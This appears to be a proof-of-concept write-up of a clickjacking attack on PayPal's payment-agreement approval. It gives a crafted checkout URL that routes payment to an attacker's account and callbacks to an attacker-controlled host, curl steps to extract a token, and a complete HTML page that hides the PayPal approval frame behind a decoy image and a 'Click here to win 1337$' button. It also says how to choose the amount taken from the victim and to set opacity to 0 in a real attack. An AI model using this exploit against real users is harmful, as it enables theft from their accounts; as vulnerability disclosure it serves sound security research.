Of course, the victim must be logged in to PayPal in the browser.
Proof 0f C0ncept
"https://www.paypal.com/cgi-bin/webscr?address1=sectesting&address2=sectesting02&address_override=true&amount_1=1&business=<attacker-paypal-email>&cancel_return=https://xxxxxx.burpcollaborator.net/cancel_return&city=barika&cmd=_cart&country=DZ&currency_code=USD&email=<anything>@gmail.com&first_name=attacker&invoice=marketplace133703&item_name_1=attacker&item_number_1=133788802&last_name=attacker&notify_url=https://xxxxxx.burpcollaborator.net/notify_url&quantity_1=1&return=https://xxxxxx.burpcollaborator.net/return&state=05&upload=1&zip=1337"
1. In the link above, change business to the attacker's PayPal email, return and notify_url to your own host so you receive the HTTP requests, and amount_1 to how much money you want to take from the victim's account. You can also change the first/last name and the address to your own info; when you do, that billing full name/address gets registered in the victim's account.
2. Now send a GET request to that URL using curl, and grep the token value from the response.
3. Upload this poc.html to your host and put your token in the ba_token parameter.
<!DOCTYPE html>
<html>
<head>
<title>POC</title>
</head>
<body>
<!-- decoy image shown to the victim -->
<center><img src="https://i.ibb.co/bWqXsQT/Mnanauk-2020-Chef-Mnanauk.jpg"></center>
<style>
iframe {
width: 1920px;
height: 1080px;
position: absolute;
top:0; left:-20px;
opacity: 1.01;
z-index: 1;
}
</style>
<!-- PayPal approval page framed over the decoy; replace <TOKEN> with the ba_token value -->
<iframe src="https://www.paypal.com/agreements/approve?nolegacy=1&ba_token=<TOKEN>"></iframe>
<button style="position: fixed; display: inline; z-index: 10; left: 701px; top: 520px;">Click here to win 1337$ => </button></body>
</html>
Note: the opacity should be 0 in a real attack; you can change it.
Now log in to your PayPal in the browser and open the HTML page.
*Beware: click the link!